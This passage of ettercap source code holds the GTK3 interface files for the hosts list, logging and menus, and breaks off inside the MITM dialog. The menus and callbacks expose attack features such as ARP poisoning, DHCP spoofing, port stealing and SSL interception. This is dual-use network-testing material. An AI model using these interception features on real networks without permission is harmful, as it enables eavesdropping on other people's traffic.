liststore = gtk_list_store_new (4, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_POINTER); /* walk the hosts list */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { /* enlarge the list */ gtk_list_store_append (liststore, &iter); /* fill the element */ gtk_list_store_set (liststore, &iter, 0, ip_addr_ntoa(&hl->ip, tmp), 1, mac_addr_ntoa(hl->mac, tmp2), 3, hl, -1); if (hl->hostname) { gtk_list_store_set (liststore, &iter, 2, hl->hostname, -1); } else { /* resolve the hostname (using the cache) */ if(host_iptoa(&hl->ip, name) == -E_NOMATCH) { gtk_list_store_set(liststore, &iter, 2, "resolving...", -1); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LIST_STORE; ro->liststore = GTK_LIST_STORE(liststore); ro->treeiter = iter; ro->column = 2; ro->ip = &hl->ip; g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else gtk_list_store_set (liststore, &iter, 2, name, -1); } } /* return FALSE so that g_idle_add() only calls it once */ return FALSE; } void gtkui_button_callback(GtkWidget *widget, gpointer data) { GList *list; GtkTreeIter iter; GtkTreeModel *model; char tmp[MAX_ASCII_ADDR_LEN]; struct hosts_list *hl = NULL; gint *type = data; /* variable not used */ (void) widget; if (type == NULL) return; model = GTK_TREE_MODEL (liststore); if(gtk_tree_selection_count_selected_rows(selection) > 0) { list = gtk_tree_selection_get_selected_rows (selection, &model); for(list = g_list_last(list); list; list = g_list_previous(list)) { gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get(model, &iter, 3, &hl, -1); switch(*type) { case HOST_DELETE: DEBUG_MSG("gtkui_button_callback: delete host"); gtk_list_store_remove(GTK_LIST_STORE (liststore), &iter); /* remove the host from the list */ LIST_REMOVE(hl, next); SAFE_FREE(hl->hostname); SAFE_FREE(hl); break; case HOST_TARGET1: DEBUG_MSG("gtkui_button_callback: add target1"); /* add the ip to the target */ add_ip_list(&hl->ip, EC_GBL_TARGET1); gtkui_create_targets_array(); USER_MSG("Host %s added to TARGET1\n", ip_addr_ntoa(&hl->ip, tmp)); break; case HOST_TARGET2: DEBUG_MSG("gtkui_button_callback: add target2"); /* add the ip to the target */ add_ip_list(&hl->ip, EC_GBL_TARGET2); gtkui_create_targets_array(); USER_MSG("Host %s added to TARGET2\n", ip_addr_ntoa(&hl->ip, tmp)); break; } } /* free the list of selections */ g_list_free_full(list, (GDestroyNotify)gtk_tree_path_free); } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_live.c000664 000000 000000 00000002020 13711276346 021740 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ /* the interface */ void gtkui_sniff_live(void) { DEBUG_MSG("gtk_sniff_live"); //gtkui_create_menu(1); /* online menus */ } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_logging.c000664 000000 000000 00000012340 13711276346 022435 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #define FILE_LEN 40 /* proto */ static void log_all(void); static void log_info(void); static void log_msg(void); /* globals */ static char *logfile; /*******************************************/ void toggle_compress(GSimpleAction *action, GVariant *value, gpointer data) { (void) data; g_simple_action_set_state(action, value); EC_GBL_OPTIONS->compress ^= 1; } /* * display the log dialog */ void gtkui_log_all(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog; gchar *filename; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_log_all"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); dialog = gtk_file_chooser_dialog_new("Save all to logfile...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, "_Cancel", GTK_RESPONSE_CANCEL, "_Save", GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_widget_destroy(dialog); memcpy(logfile, filename, FILE_LEN); g_free(filename); log_all(); } else { gtk_widget_destroy(dialog); } } static void log_all(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_loglevel(LOG_PACKET, logfile); SAFE_FREE(logfile); } /* * display the log dialog */ void gtkui_log_info(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog; gchar *filename; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_log_info"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); dialog = gtk_file_chooser_dialog_new("Save infos to logfile...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, "_Cancel", GTK_RESPONSE_CANCEL, "_Save", GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_widget_destroy(dialog); memcpy(logfile, filename, FILE_LEN); g_free(filename); log_info(); } else { gtk_widget_destroy(dialog); } } static void log_info(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_loglevel(LOG_INFO, logfile); SAFE_FREE(logfile); } void gtkui_stop_log(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; set_loglevel(LOG_STOP, ""); gtkui_message("Logging was stopped."); } /* * display the log dialog */ void gtkui_log_msg(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog; gchar *filename; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_log_msg"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); dialog = gtk_file_chooser_dialog_new("Safe Log Messages in file...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_SAVE, "_Cancel", GTK_RESPONSE_CANCEL, "_Save", GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), "."); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtk_widget_destroy(dialog); memcpy(logfile, filename, FILE_LEN); g_free(filename); log_msg(); } else { gtk_widget_destroy(dialog); } } static void log_msg(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_msg_loglevel(LOG_TRUE, logfile); SAFE_FREE(logfile); } void gtkui_stop_msg(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; set_msg_loglevel(LOG_FALSE, NULL); gtkui_message("Message logging was stopped."); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_menus.c000664 000000 000000 00000100342 13711276346 022136 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ #define ENABLED "true" #define DISABLED "false" /* proto */ static void toggle_sniffing(GtkToggleButton *button, gpointer data); static void scanbutton_clicked(GtkButton *button, gpointer data); static void hostlistbutton_clicked(GtkButton *button, gpointer data); static void mitmstopbutton_clicked(GtkButton *button, gpointer data); /*******************************************/ void gtkui_create_menu(GApplication *app, gpointer data) { GtkWidget *header, *menubutton, *logo, *content, *vpaned, *scroll, *box; GtkTextIter iter; GtkBuilder *builder; GMenu *menu; gchar *title, *path; guint i, live = GPOINTER_TO_INT(data); /* accelerators */ // TODO shortcuts for start/stop sniffing static gtkui_accel_map_t app_accels[] = { #ifndef OS_WINDOWS {"app.help", {"F1", NULL}}, #endif {"app.quit", {"q", "x", NULL}} }; static gtkui_accel_map_t targets_accels[] = { {"app.current_targets", {"t", NULL}}, {"app.select_targets", {"t", NULL}}, {"app.set_protocol", {"p", NULL}}, {"app.wipe_targets", {"w", NULL}} }; static gtkui_accel_map_t hosts_accels[] = { {"app.hosts_list", {"h", NULL}}, {"app.scan_hosts", {"s", NULL}} }; static gtkui_accel_map_t view_accels[] = { {"app.view_connections", {"c", NULL}}, {"app.view_profiles", {"o", NULL}}, {"app.visualization_method", {"v", NULL}}, {"app.visualization_regex", {"r", NULL}} }; static gtkui_accel_map_t filter_accels[] = { {"app.filter_load", {"f", NULL}}, {"app.filter_stop", {"f", NULL}} }; static gtkui_accel_map_t logging_accels[] = { {"app.log_all", {"i", NULL}}, {"app.log_info", {"i", NULL}}, {"app.log_msg", {"m", NULL}} }; #ifdef HAVE_PLUGINS static gtkui_accel_map_t plugins_accels[] = { {"app.plugin_manage", {"p", NULL}} }; #endif /* actions */ static GActionEntry app_actions[] = { /* app menu */ {"about", gtkui_about, NULL, NULL, NULL, {}}, {"shortcuts", gtkui_show_shortcuts, "s", NULL, NULL, {}}, #ifndef OS_WINDOWS {"help", gtkui_help, NULL, NULL, NULL, {}}, #endif {"quit", gtkui_exit, NULL, NULL, NULL, {}} }; static GActionEntry targets_actions[] = { /* targets menu */ {"current_targets", gtkui_current_targets, NULL, NULL, NULL, {}}, {"select_targets", gtkui_select_targets, NULL, NULL, NULL, {}}, {"set_protocol", gtkui_select_protocol, NULL, NULL, NULL, {}}, {"reverse_matching", NULL, NULL, DISABLED, toggle_reverse, {}}, {"wipe_targets", wipe_targets, NULL, NULL, NULL, {}} }; static GActionEntry hosts_actions[] = { /* hosts menu */ {"hosts_list", gtkui_host_list, NULL, NULL, NULL, {}}, #ifdef WITH_IPV6 {"enable_ipv6scan", NULL, NULL, DISABLED, toggle_ip6scan, {}}, #endif {"scan_hosts", gtkui_scan, NULL, NULL, NULL, {}}, {"load_hosts", gtkui_load_hosts, NULL, NULL, NULL, {}}, {"save_hosts", gtkui_save_hosts, NULL, NULL, NULL, {}} }; static GActionEntry view_actions[] = { /* view menu */ {"view_connections", gtkui_show_connections, NULL, NULL, NULL, {}}, {"view_profiles", gtkui_show_profiles, NULL, NULL, NULL, {}}, {"view_statistics", gtkui_show_stats, NULL, NULL, NULL, {}}, {"resolve_ipaddresses", NULL, NULL, DISABLED, toggle_resolve, {}}, {"visualization_method", gtkui_vis_method, NULL, NULL, NULL, {}}, {"visualization_regex", gtkui_vis_regex, NULL, NULL, NULL, {}}, {"wifi_key", gtkui_wifi_key, NULL, NULL, NULL, {}} }; static GActionEntry mitm_actions[] = { /* MITM menu */ {"arp_poisoning", gtkui_arp_poisoning, NULL, NULL, NULL, {}}, #ifdef WITH_IPV6 {"ndp_poisoning", gtkui_ndp_poisoning, NULL, NULL, NULL, {}}, #endif {"icmp_redirect", gtkui_icmp_redir, NULL, NULL, NULL, {}}, {"port_stealing", gtkui_port_stealing, NULL, NULL, NULL, {}}, {"dhcp_spoofing", gtkui_dhcp_spoofing, NULL, NULL, NULL, {}}, {"mitm_stop", gtkui_mitm_stop, NULL, NULL, NULL, {}}, {"sslredir", gtkui_sslredir_show, NULL, NULL, NULL, {}} }; static GActionEntry filter_actions[] = { /* filters menu */ {"filter_load", gtkui_load_filter, NULL, NULL, NULL, {}}, {"filter_stop", gtkui_stop_filter, NULL, NULL, NULL, {}} }; static GActionEntry logging_actions[] = { /* logging menu */ {"log_all", gtkui_log_all, NULL, NULL, NULL, {}}, {"log_info", gtkui_log_info, NULL, NULL, NULL, {}}, {"log_stop", gtkui_stop_log, NULL, NULL, NULL, {}}, {"log_msg", gtkui_log_msg, NULL, NULL, NULL, {}}, {"log_stop_msg", gtkui_stop_msg, NULL, NULL, NULL, {}}, {"log_compress", NULL, NULL, DISABLED, toggle_compress, {}} }; #ifdef HAVE_PLUGINS static GActionEntry plugins_actions[] = { /* plugins menu */ {"plugin_manage", gtkui_plugin_mgmt, NULL, NULL, NULL, {}}, {"plugin_load", gtkui_plugin_load, NULL, NULL, NULL, {}} }; #endif DEBUG_MSG("gtkui_create_menu - live: %d", live); /* honor CLI options */ if (EC_GBL_OPTIONS->reversed) targets_actions[3].state = ENABLED; if (EC_GBL_OPTIONS->resolve) view_actions[3].state = ENABLED; if (EC_GBL_OPTIONS->compress) logging_actions[5].state = ENABLED; #ifdef WITH_IPV6 if (EC_GBL_OPTIONS->ip6scan) hosts_actions[1].state = ENABLED; #endif /* add actions to the application */ g_action_map_add_action_entries(G_ACTION_MAP(app), app_actions, G_N_ELEMENTS(app_actions), app); g_action_map_add_action_entries(G_ACTION_MAP(app), targets_actions, G_N_ELEMENTS(targets_actions), app); /* some things doesn't apply when in bridge mode */ if (live == 1 && EC_GBL_SNIFF->type == SM_UNIFIED) g_action_map_add_action_entries(G_ACTION_MAP(app), hosts_actions, G_N_ELEMENTS(hosts_actions), app); g_action_map_add_action_entries(G_ACTION_MAP(app), view_actions, G_N_ELEMENTS(view_actions), app); /* some things doesn't apply when in bridge mode */ if (live == 1 && EC_GBL_SNIFF->type == SM_UNIFIED) g_action_map_add_action_entries(G_ACTION_MAP(app), mitm_actions, G_N_ELEMENTS(mitm_actions), app); g_action_map_add_action_entries(G_ACTION_MAP(app), filter_actions, G_N_ELEMENTS(filter_actions), app); g_action_map_add_action_entries(G_ACTION_MAP(app), logging_actions, G_N_ELEMENTS(logging_actions), app); #ifdef HAVE_PLUGINS g_action_map_add_action_entries(G_ACTION_MAP(app), plugins_actions, G_N_ELEMENTS(plugins_actions), app); #endif /* map accelerators to actions */ for (i=0; i < G_N_ELEMENTS(app_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(app), app_accels[i].action, app_accels[i].accel); for (i=0; i < G_N_ELEMENTS(targets_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(app), targets_accels[i].action, targets_accels[i].accel); /* some things doesn't apply when in bridge mode */ if (live == 1 && EC_GBL_SNIFF->type == SM_UNIFIED) for (i=0; i < G_N_ELEMENTS(hosts_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(app), hosts_accels[i].action, hosts_accels[i].accel); for (i=0; i < G_N_ELEMENTS(view_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(app), view_accels[i].action, view_accels[i].accel); for (i=0; i < G_N_ELEMENTS(filter_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(app), filter_accels[i].action, filter_accels[i].accel); for (i=0; i < G_N_ELEMENTS(logging_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(app), logging_accels[i].action, logging_accels[i].accel); #ifdef HAVE_PLUGINS for (i=0; i < G_N_ELEMENTS(plugins_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(app), plugins_accels[i].action, plugins_accels[i].accel); #endif /* menu structures */ builder = gtk_builder_new(); gtk_builder_add_from_string(builder, "" " " "
" #ifndef OS_WINDOWS " " " Help" " app.help" " help-browser" " " #endif " " " Shortcuts" " app.shortcuts" " main-shortcuts" " " " " " _About Ettercap" " app.about" " help-about" " " "
" "
" " " " _Quit" " app.quit" " application-exit" " " "
" " " " " " " " _Targets" "
" " " " Current targets" " app.current_targets" " edit-find" " " " " " Select targets" " app.select_targets" " list-add" " " "
" "
" " " " _Protocol" " app.set_protocol" " go-jump" " " " " " Reverse matching" " app.reverse_matching" " " "
" "
" " " " _Wipe targets" " app.wipe_targets" " edit-clear" " " "
" " " " " " _Hosts" "
" " " " _Hosts list" " app.hosts_list" " " "
" "
" #ifdef WITH_IPV6 " " " Enable IPv6 Scan" " app.enable_ipv6scan" " " #endif " " " _Scan for hosts" " app.scan_hosts" " edit-find" " " "
" "
" " " " Load hosts from file ..." " app.load_hosts" " document-open" " " " " " Save hosts to file ..." " app.save_hosts" " document-save" " " "
" " " " " " _View" "
" " " " _Connections" " app.view_connections" " format-justify-fill" " " " " " Pr_ofiles" " app.view_profiles" " format-justify-left" " " " " " _Statistics" " app.view_statistics" " document-properties" " " "
" "
" " " " Resolve IP addresses" " app.resolve_ipaddresses" " " " " " _Visualization method..." " app.visualization_method" " preferences-system" " " " " " Visualization _regex..." " app.visualization_regex" " edit-find" " " "
" "
" " " " Set the _WiFi key..." " app.wifi_key" " edit-find" " " "
" " " " " " _Filters" "
" " " " Load a filter..." " app.filter_load" " document-open" " " " " " Stop _filtering" " app.filter_stop" " process-stop" " " "
" " " " " " _Logging" "
" " " " Logging all packets and infos" " app.log_all" " document-save" " " " " " Logging only infos" " app.log_info" " document-save-as" " " " " " Stop logging infos" " app.log_stop" " process-stop" " " "
" "
" " " " Log user messages" " app.log_msg" " document-revert" " " " " " Stop logging messages" " app.log_stop_msg" " process-stop" " " "
" "
" " " " Compressed logfile" " app.log_compress" " " "
" " " #ifdef HAVE_PLUGINS " " " _Plugins" "
" " " " Manage plugins" " app.plugin_manage" " system-run" " " " " " Load a plugin..." " app.plugin_load" " document-open" " " "
" " " #endif " " " " "
" " MITM" " " " ARP poisoning..." " app.arp_poisoning" " " #ifdef WITH_IPV6 " " " NDP poisoning" " app.ndp_poisoning" " " #endif " " " ICMP redirect..." " app.icmp_redirect" " " " " " Port stealing..." " app.port_stealing" " " " " " DHCP spoofing..." " app.dhcp_spoofing" " " "
" "
" " " " Stop MITM attack(s)" " app.mitm_stop" " " "
" "
" " " " SSL Intercept" " app.sslredir" " " "
" " " "", -1, NULL); /* set app menu */ gtk_application_set_app_menu(GTK_APPLICATION(app), G_MENU_MODEL(gtk_builder_get_object(builder, "app-menu"))); if (g_getenv("APP_MENU_FALLBACK")) g_object_set(gtk_settings_get_default(), "gtk-shell-shows-app-menu", FALSE, NULL); /* Adjust titel formatting */ title = g_strdup(PROGRAM); *title = g_ascii_toupper(*title); /* reuse main window */ gtk_application_add_window(GTK_APPLICATION(app), GTK_WINDOW(window)); /* create header bar and menubuttons */ header = gtk_header_bar_new(); gtk_header_bar_set_title(GTK_HEADER_BAR(header), title); gtk_header_bar_set_subtitle(GTK_HEADER_BAR(header), EC_VERSION " (EB)"); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); gtk_window_set_titlebar(GTK_WINDOW(window), header); /* start/stop sniffing button */ menubutton = gtk_toggle_button_new(); gtk_widget_set_tooltip_text(menubutton, "Start / Stop Sniffing"); if (EC_GBL_CONF->sniffing_at_startup) { gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("media-playback-stop-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(menubutton), TRUE); } else gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("media-playback-start-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_header_bar_pack_start(GTK_HEADER_BAR(header), menubutton); g_signal_connect(G_OBJECT(menubutton), "toggled", G_CALLBACK(toggle_sniffing), NULL); /* menu button for Ettercap menu */ menubutton = gtk_menu_button_new(); menu = G_MENU(gtk_builder_get_object(builder, "ettercap-menu")); gtk_widget_set_tooltip_text(menubutton, "Ettercap Menu"); if (live == 0 || EC_GBL_SNIFF->type == SM_BRIDGED) g_menu_remove(menu, 1); // Remove Hosts Menu gtk_menu_button_set_menu_model(GTK_MENU_BUTTON(menubutton), G_MENU_MODEL(menu)); gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("open-menu-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_header_bar_pack_end(GTK_HEADER_BAR(header), menubutton); /* some things doesn't apply when in bridge mode */ if (live == 1 && EC_GBL_SNIFF->type == SM_UNIFIED) { /* button for host scan */ menubutton = gtk_button_new(); gtk_widget_set_tooltip_text(menubutton, "Scan for hosts"); gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("edit-find-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_header_bar_pack_start(GTK_HEADER_BAR(header), menubutton); g_signal_connect(G_OBJECT(menubutton), "clicked", G_CALLBACK(scanbutton_clicked), NULL); /* menu button for hosts menu */ menubutton = gtk_button_new(); gtk_widget_set_tooltip_text(menubutton, "Hosts List"); gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("network-server-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_header_bar_pack_start(GTK_HEADER_BAR(header), menubutton); g_signal_connect(G_OBJECT(menubutton), "clicked", G_CALLBACK(hostlistbutton_clicked), NULL); /* menu button to stop MITM */ menubutton = gtk_button_new(); gtk_widget_set_tooltip_text(menubutton, "Stop MITM"); gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("process-stop-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_header_bar_pack_end(GTK_HEADER_BAR(header), menubutton); g_signal_connect(G_OBJECT(menubutton), "clicked", G_CALLBACK(mitmstopbutton_clicked), NULL); /* menu button for MITM menu */ menubutton = gtk_menu_button_new(); gtk_widget_set_tooltip_text(menubutton, "MITM menu"); gtk_menu_button_set_menu_model(GTK_MENU_BUTTON(menubutton), G_MENU_MODEL(gtk_builder_get_object(builder, "mitm-menu"))); gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("network-workgroup-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_header_bar_pack_end(GTK_HEADER_BAR(header), menubutton); } /* fetch and replace main content area */ content = gtk_bin_get_child(GTK_BIN(window)); gtk_container_remove(GTK_CONTAINER(window), content); box = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER(window), box); /* prepare infobar for later notifications */ infobar = gtk_info_bar_new(); gtk_widget_set_no_show_all(infobar, TRUE); infolabel = gtk_label_new(""); gtk_widget_show(infolabel); gtk_container_add(GTK_CONTAINER( gtk_info_bar_get_content_area(GTK_INFO_BAR(infobar))), infolabel); gtk_info_bar_add_button(GTK_INFO_BAR(infobar), "_OK", GTK_RESPONSE_OK); infoframe = gtk_frame_new(NULL); gtk_widget_set_no_show_all(infoframe, TRUE); gtk_frame_set_shadow_type(GTK_FRAME(infoframe), GTK_SHADOW_NONE); gtk_container_add(GTK_CONTAINER(infoframe), infobar); g_signal_connect(G_OBJECT(infobar), "response", G_CALLBACK(gtkui_infobar_hide), NULL); gtk_box_pack_start(GTK_BOX(box), infoframe, FALSE, FALSE, 0); vpaned = gtk_paned_new(GTK_ORIENTATION_VERTICAL); gtk_box_pack_start(GTK_BOX(box), vpaned, TRUE, TRUE, 0); notebook_frame = gtk_frame_new(NULL); gtk_frame_set_shadow_type(GTK_FRAME(notebook_frame), GTK_SHADOW_IN); gtk_paned_pack1(GTK_PANED(vpaned), notebook_frame, TRUE, TRUE); path = INSTALL_DATADIR "/" PROGRAM "/" LOGO_FILE; if(g_file_test(path, G_FILE_TEST_EXISTS)) logo = gtk_image_new_from_file(path); else /* if neither path is valid gtk will use a broken image icon */ logo = gtk_image_new_from_file("./share/" LOGO_FILE); gtk_widget_set_halign(logo, GTK_ALIGN_CENTER); gtk_widget_set_valign(logo, GTK_ALIGN_CENTER); gtk_container_add(GTK_CONTAINER(notebook_frame), logo); /* messages */ scroll = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_ALWAYS); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scroll), GTK_SHADOW_IN); gtk_widget_set_size_request(scroll, -1, 140); gtk_paned_pack2(GTK_PANED (vpaned), scroll, FALSE, TRUE); gtk_widget_show(scroll); textview = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview), GTK_WRAP_WORD_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview), FALSE); gtk_container_add(GTK_CONTAINER (scroll), textview); gtk_widget_show(textview); msgbuffer = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview)); gtk_text_buffer_get_end_iter(msgbuffer, &iter); endmark = gtk_text_buffer_create_mark(msgbuffer, "end", &iter, FALSE); gtk_widget_show_all(window); } void gtkui_create_tab_menu(void) { GtkWidget *context; GtkBuilder *builder; GSimpleActionGroup *actiongroup; guint i; static GActionEntry tab_actions[] = { {"detach_page", gtkui_page_detach_current, NULL, NULL, NULL, {}}, {"close_page", gtkui_page_close_current, NULL, NULL, NULL, {}}, {"next_page", gtkui_page_right, NULL, NULL, NULL, {}}, {"prev_page", gtkui_page_left, NULL, NULL, NULL, {}} }; static gtkui_accel_map_t tab_accels[] = { {"tab.detach_page", {"d", NULL}}, {"tab.close_page", {"w", NULL}}, {"tab.next_page", {"Tab", "Right", NULL}}, {"tab.prev_page", {"Tab", "Left", NULL}} }; /* build menu structure */ builder = gtk_builder_new(); gtk_builder_add_from_string(builder, "" " " "
" " " " Detach page" " tab.detach_page" " go-up" " " " " " Close page" " tab.close_page" " window-close" " " "
" "
" " " " Next page" " tab.next_page" " go-next" " " " " " Previous page" " tab.prev_page" " go-previous" " " "
" " " "", -1, NULL); /* create dedicated action group and attach to menu widget */ actiongroup = g_simple_action_group_new(); g_action_map_add_action_entries(G_ACTION_MAP(actiongroup), tab_actions, G_N_ELEMENTS(tab_actions), NULL); /* map accelerators to actions */ // FIXME doesn't work yet for (i = 0; i < G_N_ELEMENTS(tab_accels); i++) gtk_application_set_accels_for_action(GTK_APPLICATION(etterapp), tab_accels[i].action, tab_accels[i].accel); /* connect tab menu to right-click handler of notebook */ context = gtk_menu_new_from_model(G_MENU_MODEL(gtk_builder_get_object(builder, "tab-menu"))); gtk_widget_insert_action_group(context, "tab", G_ACTION_GROUP(actiongroup)); g_signal_connect(G_OBJECT(notebook), "button-press-event", G_CALLBACK(gtkui_context_menu), context); g_object_unref(builder); } /* * callback to start and stop sniffing and swaping play-button */ static void toggle_sniffing(GtkToggleButton *button, gpointer data) { (void) data; if (gtk_toggle_button_get_active(button)) { /* start sniffing */ gtkui_start_sniffing(); /* replace button image with stop icon */ gtk_button_set_image(GTK_BUTTON(button), gtk_image_new_from_icon_name("media-playback-stop-symbolic", GTK_ICON_SIZE_BUTTON)); } else { /* stop sniffing */ gtkui_stop_sniffing(); /* replace button image with start icon */ gtk_button_set_image(GTK_BUTTON(button), gtk_image_new_from_icon_name("media-playback-start-symbolic", GTK_ICON_SIZE_BUTTON)); } } /* * callback when scan button is clicked * - wrapper due to different callback function signatures */ static void scanbutton_clicked(GtkButton *button, gpointer data) { (void) button; (void) data; gtkui_scan(NULL, NULL, NULL); } /* * callback when hostlist button is clicked * - wrapper due to different callback function signatures */ static void hostlistbutton_clicked(GtkButton *button, gpointer data) { (void) button; (void) data; gtkui_host_list(NULL, NULL, NULL); } /* * callback when scan button is clicked * - wrapper due to different callback function signatures */ static void mitmstopbutton_clicked(GtkButton *button, gpointer data) { (void) button; (void) data; gtkui_mitm_stop(NULL, NULL, NULL); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_mitm.c000664 000000 000000 00000040242 13711276346 021757 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void gtkui_start_mitm(void); /* globals */ #define PARAMS_LEN 512 static char params[PARAMS_LEN+1]; /*******************************************/ void gtkui_arp_poisoning(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *vbox, *hbox, *image, *button1, *button2, *frame, *content_area; gint response = 0; gboolean remote = FALSE; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_arp_poisoning"); // not needed, the \0 is already appended from snprintf // memset(params, '\0', PARAMS_LEN+1); dialog = gtk_dialog_new_with_buttons("MITM Attack: ARP Poisoning", GTK_WINDOW (window), 